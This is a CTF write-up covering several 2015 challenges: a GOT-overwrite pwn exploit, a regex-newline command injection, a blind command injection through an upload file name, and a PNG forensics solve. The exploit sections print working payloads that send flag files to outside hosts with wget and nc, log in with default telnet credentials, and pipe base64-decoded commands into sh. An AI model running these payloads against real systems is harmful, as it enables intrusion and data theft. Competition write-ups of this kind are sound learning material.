This challenge was solved by and the write up was written by one of my teammates, akg.

Open any non-existing webpage, like this: https://ctf2015.hitcon.org/asd

Oh 404 not found
Ok, ok I know ... here is your flag: hitcon{do_you_wanna_play_a_game?enjoy_hitcon_ctf_2015_quals:)}

This challenge was solved by one of my teammates, @kutyacica and me and the write up was written by me.

This was a binary which read 1024 bytes from stdin to BSS and indexes into the buffer with the buffer’s first 8 bytes as an index and writes to that position \x10\x00\x00\x00\x00\x00\x00\x00 and the buffer’s 8-16 bytes.

As the index is signed, we can use negative numbers and write to address before the buffer. Although we could only use 16-byte aligned addresses.

So we overwrite the GOT loading structures which caused the dl_fixup to overwrite arbitrary memory. As we did not know the address of the system, we also had to make dl_fixup to calculate for us. Fortunately it could be done as it called add instruction on some of our inputs. So we queried the __libc_start_main’s address (already in GOT: 0x600B80) and added the difference to main (system-start_main = 0x46640-0x21dd0 = 0x24870).

As the stdin, stdout, stderr was closed, we used a simple wget callback to our server: http://cuby.hu/x/\$(cat flag|base64).

The exploit was:

while true; do python -c "from pwn import *; bufStart=0x600bd0; where1=p64(0x24870); 
where2='X'*8; what='B'*8; yval=p64(0x600B80-8); y=p64(bufStart+8*8); rdi=p64(bufStart+400); 
payload='\x80'+'\xff'*7 + p64(bufStart) + where1 + rdi + where2 + p64(7) + yval*9 + 
p64(bufStart) + y + p64(0x42)*16 + p64(bufStart+248) + p64(bufStart-8) + p64(bufStart+272) + 
'A'*4 + '\x0a\x03\xFF\xFF' + what + p64(0x43)*13 + 'A'*8 + 
'wget http://cuby.hu/x/\$(cat flag|base64);sleep 10;'; 
print payload+cyclic(1024-len(payload))"|nc 52.68.211.239 10000; sleep 0.1; done

This challenge was solved by one of my teammates, nguyen and me and the write up was written by me.

Run this on one thread:

while true; do wget -qO- "http://52.68.245.164/?args[]=abc%0a&args[]=twistd&args[]=telnet" > /dev/null; done

This works because $ in regex allows \n too (\Z would not allow this), so it will run the following commands:

/bin/orange abc
twistd telnet

Connect on another thread: nc 52.68.245.164 4040 (this is the port of the twistd telnet service), user/pass: admin/changeme (default credentials) and execute this until you got the flag: import os;print os.popen("/read_flag").read();

python -c "import sys;sys.stdout.write(\"admin\r\nchangeme\r\nimport os;
print '%r'%os.popen('/read_flag').read();\r\n\")"|nc 52.68.245.164 4040

Sometimes you have to try it multiple times, because the process is killed very fast.

This challenge was solved by and the write up was written by teammates, nguyen and akg

Through testing to know it’s a blind cmd injection in filename of a file upload.

Set a host listen to a port and inject a cmd, ex: filename.txt; ls |nc ip port

To copy the source, find .. -iname '*gz'|xargs cat|nc ip port, analyze it, we have expl:

~  echo "cat /home/asis/flag.txt | nc ip port" | base64
<base64string>
~ a.txt| echo <base64string> | base64 -d | sh
ASIS{72a126946e40f67a04d926dd4786ff15}

We got a PNG file with a size of 15MB.

You cannot open the file as some programs simply freeze, others show out of memory exceptions, or other errors.

Loading into Wireshark for example shows the file’s basic information like it’s width and height.

alt

It is a very huge file, so that explains why we cannot open it earlier.

We have to make some educated guesses. Looking into the file contents you can see that the IDAT part of the file is full of zeros:

alt

So I used one of my helper method which gave me a quick summary of the contents of the file:

\x89PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0d
IHDR\x00\x05C\x9b\x00\x05C\x9b\x01\x03\x00\x00\x00\xa5\xa5\x12\xb1\x00\x00\x00\x06
[email protected]\x00\xe0\xe0\[email protected]\xa3~c\xab\x00\xdb\xfd\xf1
IDATx\xda\xec\xc1\x01\x0d\x00\x00\x00\xc2\xa0\xf7Om\x0f\x07\x04\x0c
<7207787x00>
\xbc\x19\x00\x00\x00\xff\xff...\xa0\xf7Om\x10\x81\x0c
<7207829x00>
\xe0\xd5\x00\x00\x00\xff\xff\x01\x00\x00\xff\xffn\x1f\xdb\x89\x8e.\xf3\xe9\x00\x00\x00\x00
IEND\xaeB`\x82

The IDAT header contains zlib compressed data (as this is the only supported encoding method). So there is some information in the middle of the file.

As the file’s BitDepth is 1, this means the 1 byte contains 8 pixel information, so the uncompressed RAW bitmap data is 344987 * (344987 // 8 + 1) = ~15Gb.

As I did not want to decompress this much data to my hard disk I wrote a C# script to seek into the middle of the image data (so to about 7.4GB) and read the middle of the file and extracted a few MB’s of RAW data.

I created a summary of this too:

<2154200x00>\xf1\xfc...36 bytes...\xcf\x0a
<43085x00>\xf1\xf9\x8...\xe7\x0a
<43085x00>\xf5\xf3\xef...\xcf\x0a
[...10 times again...]
<2154300x00>

What we see is 40 bytes data in the middle of every row. So I simply recovered these bits with the following code snippet:

long strideLen = 344987 / 8 + 1 + 1;
for (int i = 0; i < 16; i++)
    rows.Add(Conversion.BytesToHex(png2.Skip(baseOffset + i * (int)strideLen + 21542).Take(40).ToArray()));

And converted the bytes to bits aka. pixels in this case (with my web-based conversion toolset hosted on https://kt.pe/tools.html) and replaced “1” characters with space “ “ to make it more readable:

....000       00000     0    00000      0             000     0000        00    00   000               000      000    0              0    000     000000      00                     0000      000      000     00           000000        0      00       00     000        00    00   000     0000     0000        00  00    
    000      00  000    0   00  000    0            000 00   00  00       00   00  000 00             00 00    00 00   0              0  000 00    0           00                    00  00    00 00   000 00   00            0             0      00       00    00 00       00   00   00 00   00  00   00  00       00   00   
    0 0     00     0    0  00     0    0            00   00  0    00     000   00  00   00           00   00  00   00  0              0  00   00  00          000                    0    00  00   00  00   00  00           00             0     000      000   00   00     000   00  00   00  0    00  0    00     000    0   
   00 00    00     0    0  00     0    0     000    00   00  0    00    0000  0000 00   00   00000   0        0    00  0 000     0000 0  00   00  00         0000    0000    00000   0     0  0    00  0     0 0000  00000   00        0000 0    0000     0000   0          0000  0000 0    00  0    00  0     0    0000    0   
   0  00    000         0  000         0    00 00   00   0        0     0 00   00  00   0   000 00   0 000    0     0  000 000  00  000  00   0   00000      0 00   00  00  000 00   0    00  0     0       00  00  000 00   00000    00  000    0 00     0 00   0 000      0 00   00  0     0       0   0    00    0 00    0   
   0   0     00000      0   00000      0   00   00   00000      000    0  00   00   00000   0    00  000 00   0     0  00   00  0    00   00000   00  00    0  00   0    0  0    00  00   00  0     0       00  00  0    00  00  00   0    00   0  00    0  00   000 00    0  00   00  0     0     000   00   00   0  00    0   
  00   00       0000    0      0000    0   0     0  00   00       00  00  00   00  00   00       00  00   00  0     0  0     0  0    00  00   00       00  00  00   0            00   000000  0     0     000   00       00       00  0    00  00  00   00  00   00   00  00  00   00  0     0       00   000000  00  00    0   
  0000000          00   0         00  00   0000000  0     0       00  0   00   00  0     0   000000  0     0  0     0  0     0 00     0  0     0        0  0   00   0        000000        0  0     0    00     00   000000        0 00     0  0   00   0   00   0     0  0   00   00  0     0       00        0  0   00    00  
 00     0   0      00   0  0      00  0    0        0     0  0     0 00000000  00  0     0  00   00  0     0  0    00  0     0  0    00  0     0        0 00000000  0       00   00       00  0    00   00      00  00   00        0  0    00 00000000 00000000  0     0 00000000  00  0    00  0     0       00 00000000   00  
 00     00  00     00   0  00     00   0   0     0  0    00  0    00      00   00  0    00  0    00  00   00  00   00  00   00  0    00  0    00  0    00      00   0    0  0    00  00   0   00   00  00       00  0    00  0    00  0    00      00       00   00   00      00   00  00   00  0    00  00   0       00    0   
 0      00   000  00    0   000  00    0    00 00   000 00   00  00       00   00  000 00   00  000   00 00    00 00   000 00   000 000  000 00   00  00       00   00  00  00  000  00  00    00 00   00       00  00  000  00  00   000 000      00       00    00 00       00   00   00 00   00  00   00  00       00    0   
00       0    00000     0    00000     0     000     0000     0000        00   00   0000     000  00   000      000    0 000     0000 0   0000     0000        00    0000    000  00  0000      000    0000000  00   000  00  0000     0000 0      00       00     000        00   00    000     0000     0000        00    0   

The flag was:

ASIS{e834f8a60bd854ca902fa5d4464f0394}